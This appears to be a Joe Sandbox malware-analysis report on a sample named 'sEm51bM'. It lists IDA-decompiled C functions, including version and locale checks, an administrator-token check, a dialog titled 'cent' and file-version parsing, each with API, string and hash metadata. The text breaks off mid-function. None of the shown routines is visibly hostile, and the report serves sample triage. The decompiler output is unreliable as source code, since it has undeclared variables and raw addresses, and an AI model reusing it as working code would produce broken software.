                                                                                                                                                                                                                                            • String ID: TITLE$cent
                                                                                                                                                                                                                                            • API String ID: 3370778649-3553536280
                                                                                                                                                                                                                                            • Opcode ID: 630219816d3bf2109a5e49eb12e82d532472fe13a9077d0fabd22b05bc13b9d2
                                                                                                                                                                                                                                            • Instruction ID: e431cf7f3651a775fc0972f210b03c84d01df5597e8c25589f82f64feca2f2f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 630219816d3bf2109a5e49eb12e82d532472fe13a9077d0fabd22b05bc13b9d2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601A9362447217BE33217A56C4DF6B7E2CDBC6F62F064018FE4A97150C971885286B6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E0032681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0x3281d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0x3281d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0x3281d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0x321140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E003266F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0x3281d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t18 =  &_v8; // 0x32463b
                                                                                                                                                                                                                                            				return E00326CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0032686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 003268A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003268CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,?,0000000C), ref: 003268F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00326902
                                                                                                                                                                                                                                              • Part of subcall function 003266F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0032691A), ref: 00326741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: ;F2$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-2325406992
                                                                                                                                                                                                                                            • Opcode ID: e150846a5d4d9d008fb00e794e277285587c27dd6f240a278ee9f79ff46ba485
                                                                                                                                                                                                                                            • Instruction ID: 1a8ebcbbdae293b9b4885e6441ee19caa41661c9536fe1f630613d466510e03d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e150846a5d4d9d008fb00e794e277285587c27dd6f240a278ee9f79ff46ba485
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26316131A01238DFDB33CB11EC46BAAB77CEF85768F0141A9E949A6140DB309D96CF52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                                            			E003217EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0x32a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003218DD), ref: 0032181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0032182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(003218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003218DD), ref: 00321855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,003218DD), ref: 00321883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,003218DD), ref: 0032188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: fff1ca206554b5e6cb19032936a601839e3c8dd0f831d88a43a5b354ab305b0b
                                                                                                                                                                                                                                            • Instruction ID: a854b3992ff76caf4ad4841ead9899596d439c5fcea838a74d848b4c18ffdd12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fff1ca206554b5e6cb19032936a601839e3c8dd0f831d88a43a5b354ab305b0b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A11B631E00219AFDB129FA4ED4AABEBB7CEF44701F11416DFA01E3290DB709D058B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00323450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E003243D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0x329404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x3291dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00323490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0032349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 003234B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 003234C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 003234CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 003234D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 852535152-3940384054
                                                                                                                                                                                                                                            • Opcode ID: be6fd996d1b4756196aa7f0d45156a37e811f33b80631e2c16f91c331e0d2ba2
                                                                                                                                                                                                                                            • Instruction ID: b5372bd99784dc7301c7c0ee0418aee0bfd2d2255e621087a9c52ef5f17fa4af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be6fd996d1b4756196aa7f0d45156a37e811f33b80631e2c16f91c331e0d2ba2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E01D431240538ABC72B6F66FC0C96D3B69EB05B10F124059F946969A0CB38AF63CBC1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00322AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0x329a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00321680(_t65, E003217C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E003265E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E00321680(_t65, E003217C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00322AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00322AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00322B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00322B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00322B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00322BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 92b8c4f1835360c2ec7cb6a8b4b1456bf50967d7029bad223aa4c62d4a495399
                                                                                                                                                                                                                                            • Instruction ID: 8f42c98fa6c003f811cd2757924b5e8efac76b890525bfd2f8f58ca636ac24eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92b8c4f1835360c2ec7cb6a8b4b1456bf50967d7029bad223aa4c62d4a495399
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E24135341082656FDF279F34AC04AFE7BAD9F56310F05009EE8C287202DB355E86CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003228E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00322773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t11 =  &_v32; // 0x323938
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									_t16 =  &_v32; // 0x323938
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00322A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00322A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
